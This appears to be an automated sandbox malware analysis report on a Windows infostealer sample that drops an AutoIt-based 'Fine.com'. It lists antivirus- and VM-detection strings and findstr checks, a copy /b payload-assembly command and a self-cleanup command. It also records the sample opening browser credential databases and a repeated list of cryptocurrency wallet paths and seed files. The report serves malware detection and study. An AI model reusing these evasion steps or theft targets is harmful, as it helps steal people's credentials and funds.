          Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          Source: Fine.com, 0000000B.00000003.2441646535.00000000040BC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: %HSWPESPY.DLLAVGHOOKX.DLLSBIEDLL.DLLSNXHK.DLLVMCHECK.DLLDIR_WATCH.DLLAPI_LOG.DLLPSTOREC.DLLAVGHOOKA.DLLCMDVRT64.DLLCMDVRT32.DLLIMAGE/JPEGCHAININGMODEAESCHAININGMODEGCMABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=UNKNOWN EXCEPTIONBAD ALLOCATION
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comAPI coverage: 3.9 %
          Source: C:\Windows\SysWOW64\timeout.exe TID: 3596Thread sleep count: 91 > 30
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comFile Volume queried: C:\ FullSizeInformationJump to behavior
          Source: C:\Users\user\Desktop\mNPTwHOuvT.exeCode function: 0_2_00406301 FindFirstFileW,FindClose,0_2_00406301
          Source: C:\Users\user\Desktop\mNPTwHOuvT.exeCode function: 0_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406CC7
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comCode function: 11_2_0023DC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,11_2_0023DC54
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comCode function: 11_2_0024A087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,11_2_0024A087
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comCode function: 11_2_0024A1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,11_2_0024A1E2
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comCode function: 11_2_0023E472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,11_2_0023E472
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comCode function: 11_2_0024A570 FindFirstFileW,Sleep,FindNextFileW,FindClose,11_2_0024A570
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comCode function: 11_2_0020C622 FindFirstFileExW,11_2_0020C622
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comCode function: 11_2_002466DC FindFirstFileW,FindNextFileW,FindClose,11_2_002466DC
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comCode function: 11_2_00247333 FindFirstFileW,FindClose,11_2_00247333
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comCode function: 11_2_002473D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,11_2_002473D4
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comCode function: 11_2_0023D921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,11_2_0023D921
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comCode function: 11_2_001D5FC8 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,11_2_001D5FC8
          Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\424372\Jump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\424372Jump to behavior
          Source: XLFUAS.11.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
          Source: XLFUAS.11.drBinary or memory string: discord.comVMware20,11696428655f
          Source: XLFUAS.11.drBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
          Source: XLFUAS.11.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
          Source: XLFUAS.11.drBinary or memory string: global block list test formVMware20,11696428655
          Source: XLFUAS.11.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
          Source: Fine.com, 0000000B.00000002.2935633690.0000000000E90000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: msedge.exe, 00000013.00000003.2669700148.000039F800334000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware20,1(
          Source: XLFUAS.11.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
          Source: XLFUAS.11.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
          Source: XLFUAS.11.drBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
          Source: XLFUAS.11.drBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
          Source: XLFUAS.11.drBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
          Source: XLFUAS.11.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
          Source: XLFUAS.11.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
          Source: XLFUAS.11.drBinary or memory string: outlook.office365.comVMware20,11696428655t
          Source: XLFUAS.11.drBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
          Source: msedge.exe, 00000013.00000002.2735012514.000002EC39C53000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
          Source: XLFUAS.11.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
          Source: XLFUAS.11.drBinary or memory string: outlook.office.comVMware20,11696428655s
          Source: XLFUAS.11.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
          Source: XLFUAS.11.drBinary or memory string: ms.portal.azure.comVMware20,11696428655
          Source: XLFUAS.11.drBinary or memory string: AMC password management pageVMware20,11696428655
          Source: XLFUAS.11.drBinary or memory string: tasks.office.comVMware20,11696428655o
          Source: Fine.com, 0000000B.00000002.2935633690.0000000000E68000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\*B
          Source: XLFUAS.11.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
          Source: XLFUAS.11.drBinary or memory string: turbotax.intuit.comVMware20,11696428655t
          Source: XLFUAS.11.drBinary or memory string: interactivebrokers.comVMware20,11696428655
          Source: XLFUAS.11.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
          Source: XLFUAS.11.drBinary or memory string: dev.azure.comVMware20,11696428655j
          Source: XLFUAS.11.drBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
          Source: Fine.com, 0000000B.00000002.2935633690.0000000000E68000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWHW
          Source: XLFUAS.11.drBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
          Source: XLFUAS.11.drBinary or memory string: bankofamerica.comVMware20,11696428655x
          Source: XLFUAS.11.drBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
          Source: XLFUAS.11.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comCode function: 11_2_0024F4FF BlockInput,11_2_0024F4FF
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comCode function: 11_2_001D338B GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,11_2_001D338B
          Source: C:\Users\user\Desktop\mNPTwHOuvT.exeCode function: 0_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00406328
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comCode function: 11_2_001F5058 mov eax, dword ptr fs:[00000030h]11_2_001F5058
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comCode function: 11_2_002320AA GetLengthSid,GetProcessHeap,HeapAlloc,CopySid,GetProcessHeap,HeapFree,11_2_002320AA
          Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comCode function: 11_2_00202992 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_00202992
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comCode function: 11_2_001F0BAF IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_001F0BAF
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comCode function: 11_2_001F0D45 SetUnhandledExceptionFilter,11_2_001F0D45
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comCode function: 11_2_001F0F91 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,11_2_001F0F91

          HIPS / PFW / Operating System Protection Evasion

          Source: Yara matchFile source: Process Memory Space: Fine.com PID: 1440, type: MEMORYSTR
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comCode function: 11_2_00231B4D LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,11_2_00231B4D
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comCode function: 11_2_001D338B GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,11_2_001D338B
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comCode function: 11_2_0023BBED SendInput,keybd_event,11_2_0023BBED
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comCode function: 11_2_0023EC6C mouse_event,11_2_0023EC6C
          Source: C:\Users\user\Desktop\mNPTwHOuvT.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Lou Lou.cmd & Lou.cmdJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa" Jump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" Jump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 424372Jump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "SYDNEY" Webmasters Jump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Hero + ..\Spell + ..\Pensions + ..\Wants + ..\Mars UJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\424372\Fine.com Fine.com UJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\PP89HD2DTRQQ" & exitJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comCode function: 11_2_002314AE GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,11_2_002314AE
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comCode function: 11_2_00231FB0 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,11_2_00231FB0
          Source: Fine.com, 0000000B.00000000.2087026390.0000000000293000.00000002.00000001.01000000.00000009.sdmp, Pmid.0.dr, Fine.com.2.drBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
          Source: Fine.comBinary or memory string: Shell_TrayWnd
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comCode function: 11_2_001F0A08 cpuid 11_2_001F0A08
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comCode function: 11_2_0022E5F4 GetLocalTime,11_2_0022E5F4
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comCode function: 11_2_0022E652 GetUserNameW,11_2_0022E652
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comCode function: 11_2_0020BCD2 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,11_2_0020BCD2
          Source: C:\Users\user\Desktop\mNPTwHOuvT.exeCode function: 0_2_00406831 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,0_2_00406831

          Stealing of Sensitive Information

          Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
          Source: Fine.com, 0000000B.00000002.2939843523.00000000043B3000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: .json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
          Source: Fine.com, 0000000B.00000002.2939843523.00000000043B3000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: .json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
          Source: Fine.com, 0000000B.00000002.2939843523.00000000043B3000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: .json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
          Source: Fine.com, 0000000B.00000002.2939843523.00000000043B3000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: .json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
          Source: Fine.com, 0000000B.00000002.2939843523.00000000043B3000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: .json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
          Source: Fine.com, 0000000B.00000002.2939843523.00000000043B3000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: .json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
          Source: Fine.com, 0000000B.00000002.2939843523.00000000043B3000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: .json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\yiaxs5ej.default\key4.db
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.files\key4.db
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.files\key4.db
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.com File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\temporary\key4.db
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.js
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.com File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
